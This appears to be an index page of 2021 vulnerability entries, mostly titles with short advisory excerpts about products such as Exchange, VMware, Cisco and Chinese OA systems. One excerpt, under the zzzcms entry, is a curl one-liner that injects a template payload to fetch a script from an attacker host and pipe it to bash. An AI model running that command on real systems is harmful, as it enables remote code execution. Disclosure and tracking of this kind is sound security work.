Apache Solr SSRF Vulnerability (CVE-2021-27905)
...
Microsoft Hyper-V Remote Code Execution Vulnerability (CVE-2021-28476)
CVE-2021-28476: a guest-to-host "Microsoft Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys. This is a proof of concept for CVE-2021-28476 "Hyper-V Remote Code Execution Vulnerability", an arbitrary memory read in vmswitch.sys Network virtualization service provider patched by Microso...
QNAP Music Station/Malware Remover Unauthenticated Remote Code Execution Vulnerability (CVE-2020-36197 CVE-2020-36198)
QNAP MusicStation/MalwareRemover Pre-Auth Remote Code Execution Summary QNAP MusicStation and MalwareRemover official apps are affected by an arbitrary file upload and a command injection vulnerabilities, leading to pre-auth remote root command execution. Product description from vendor “QNAP...
SolarWinds Orion Remote Code Execution Vulnerability (CVE-2021-31474)
...
VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21985)
Rapid7 May 26, 2021 5:34pm UTC 1 day ago• Last updated May 27, 2021 6:39pm UTC 7 hours ago Technical Analysis Threat status: Impending threat Attacker utility: Network infrastructure compromise Description On Tuesday, May 25, 2021, VMware published security advisory VMSA-2021-0010, which includes...
ESXi OpenSLP Heap Overflow Vulnerability (CVE-2021-21974)
My RCE PoC walkthrough for CVE-2021–21974 VMware ESXi OpenSLP heap-overflow vulnerability Introduction During a recent engagement, I discovered a machine that is running VMware ESXi 6.7.0. Upon inspecting any known vulnerabilities associated with this version of the software, I identified it may ...
Tenda TendaN4 Unauthorized Access Vulnerability (CNVD-2021-24481)
...
Cisco HyperFlex HX Unauthenticated File Upload Vulnerability (CVE-2021-1499)
Technical Analysis CVE-2021-1499 Arbitrary file upload RCE implied in the /upload endpoint. Patch --- unpatched/springpath.conf 2021-05-17 19:06:17.000000000 -0500 +++ patched/springpath.conf 2021-05-17 19:06:23.000000000 -0500 @@ -36,14 +36,7 @@ include uwsgiparams; - location /crossdomain.xml -...
Cisco HyperFlex HX Unauthenticated Command Injection Vulnerability (CVE-2021-1497 CVE-2021-1498)
CVE-2021-1497 and/or CVE-2021-1498 Command injection in the /storfs-asup endpoint’s token and mode parameters. Patch --- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500 +++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500 @@ -69,17 +69,6 @@ - Springpath Storfs ASUP -...
H3C IMC Remote Command Execution Vulnerability
...
Exim 4 Remote Code Execution Vulnerability (CVE-2020-28018)
CVE-2020-28018: Exim Use-after-free UAF leading to RCE Introduction There exists a Use-after-free UAF vulnerability in tls-openssl.c that allow remote unauthenticated attackers to corrupt internal memory data, thus finally achieving remote code execution. Primitives: - x Memory Leakage - x...
Pega Infinity Login Bypass Vulnerability (CVE-2021-27651)
Summary An attacker can bypass all stages of the password reset flow and reset any user's account on Pega infinity. This is done by 1 initiating the password reset flow and typing in the victim email, then 2 forcing the HTTP POST request to update the password through. An attacker could login usi...
XStream Remote Code Execution Vulnerability (CVE-2021-29505)
CVE-2021-29505 Vulnerability CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack. Affected Versions All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's...
Weaver OA weaver.common.Ctrl Arbitrary File Upload Vulnerability
...
Cisco RV34x Series Authenticated Remote Code Execution Vulnerability (CVE-2021-1413 CVE-2021-1414 CVE-2021-1415)
...
Cisco RV34X Series Privilege Escalation Vulnerability (CVE-2021-1520)
Advisory: Cisco RV34X Series - Privilege Escalation in vpnTimer May 5, 2021 |In Research |By [email protected] TL;DR A few weeks ago, we published an advisory on the Cisco RV series routers, where we outlined the root cause for authentication bypass and remote command execution issues...
Lanhai Zhuoyue Billing Management System Arbitrary File Download
...
Foxit Reader Remote Code Execution Vulnerability (CVE-2021-31473)
...
HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2021-31166)
...
Microsoft Azure Virtual Machine Information Disclosure Vulnerability (CVE-2021-27075)
CVE-2021-27075: Microsoft Azure Vulnerability Allows Privilege Escalation and Leak of Private Data Written by Paul Litvak - 11 May 2021 In this post I will explain how the Microsoft Azure Virtual Machine VM extension works and how we found a fatal vulnerability in the extension mechanism affectin...
zzzcms zzzphp parserIfLabel Template Injection Remote Code Execution Vulnerability (CVE-2021-32605)
curl -b 'keys=if:=curl http://attacker.tld/poc.sh|bashend if' 'http://target.tld/?location=search'...
Open Distro for Elasticsearch SSRF Vulnerability (CVE-2021-31828)
SSRF in Open Distro for Elasticsearch CVE-2021-31828 Rotem Bar Published on May 11, 2021 7 min read After an interesting adventure, it's now possible to announce a new CVE-2021-31828 which effects Open Distro for ElasticSearch ODFE , versions until 1.12.0.2. Open Distro is a plugin for...
Ivanti Avalanche Directory Traversal Vulnerability
SSD Advisory – Ivanti Avalanche Directory Traversal May 11, 2021 SSD Disclosure / Technical Lead Uncategorized TL;DR Find out how a directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the ‘image’ folder. Vulnerability Summar...
Fengwang Hulian Enterprise Router Logic Vulnerability
...
VoIPMonitor Unauthenticated Remote Code Execution Vulnerability (CVE-2021-30461)
SSD Advisory – VoIPmonitor UnAuth RCE May 6, 2021 SSD Disclosure / Technical Lead Uncategorized TL;DR Find out how a vulnerability in VoIPmonitor allows an unauthenticated attacker to execute arbitrary code. Vulnerability Summary VoIPmonitor is “open source network packet sniffer with commercial...
Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-28482)
...
Landray OA Frontend Arbitrary File Read Vulnerability
...
WordPress 5.7 Authenticated XXE Vulnerability (CVE-2021-29447)
WordPress 5.7 XXE Vulnerability BY KARIM EL OUERGHEMMI|APRIL 26, 2021 At SonarSource, we are constantly improving our code analyzers and security rules. We recently improved our PHP security engine to detect more OWASP Top 10 and CWE Top 25 issue types. When testing our new analyzers against some...
NETGEAR R7000 Buffer Overflow Vulnerability (CVE-2021-31802)
SSD Advisory – NETGEAR Nighthawk R7000 httpd PreAuth RCE April 26, 2021 SSD Disclosure / Technical Lead Uncategorized TL;DR Find out how a vulnerability in NETGEAR R7000 allows an attacker to run arbitrary code without requiring authentication with the device. Vulnerability Summary A vulnerabilit...
Apache OFBiz Code Execution Vulnerability (CVE-2021-30128)
...
Yonyou U8 SQL Injection Vulnerability
...
Kingsoft V8 Endpoint Security System Command Execution Vulnerability
...
Yonyou NCCloud FS File Management SQL Injection Vulnerability
...
Kingsoft V8 Endpoint Security System Arbitrary File Read Vulnerability
...
RuoYi CMS Unauthorized Access Vulnerability
...
RuoYi CMS Arbitrary File Read Vulnerability
...
WebLogic Code Execution Vulnerability (CVE-2021-2135)
...
Microsoft SharePoint Information Disclosure Vulnerability (CVE-2020-17120)
...
Cisco RV34X Series Authentication Bypass and Remote Command Execution Vulnerabilities (CVE-2021-1472 CVE-2021-1473)
Advisory: Cisco RV34X Series – Authentication Bypass and Remote Command Execution APRIL 13, 2021 TL;DR In early 2021, we reported a few security issues to Cisco related to their RV34X series of routers, two of which have been recently patched. The issues in question were an authentication bypass...
Ubuntu Privilege Escalation Vulnerability (CVE-2021-3493)
...
WebLogic T3 Deserialization Vulnerability
...
Askey RTF3505VW RCE Vulnerability (CVE-2020-28695)
...
eyouCMS RCE Vulnerability
...
Chrome Remote Code Execution Vulnerability
...
Chrome Remote Code Execution Vulnerability (CVE-2021-21220)
...
eYou Email System Remote Command Execution Vulnerability (CNVD-2021-26422)
...
Seeyon OA thirdpartyController.do Unauthenticated RCE Vulnerability
...
Netentsec NS-NGFW RCE Vulnerability
...
Landray OA Backend Arbitrary File Write Vulnerability
...
Cisco SD-WAN vManage Buffer Overflow Vulnerability (CVE-2021-1479)
...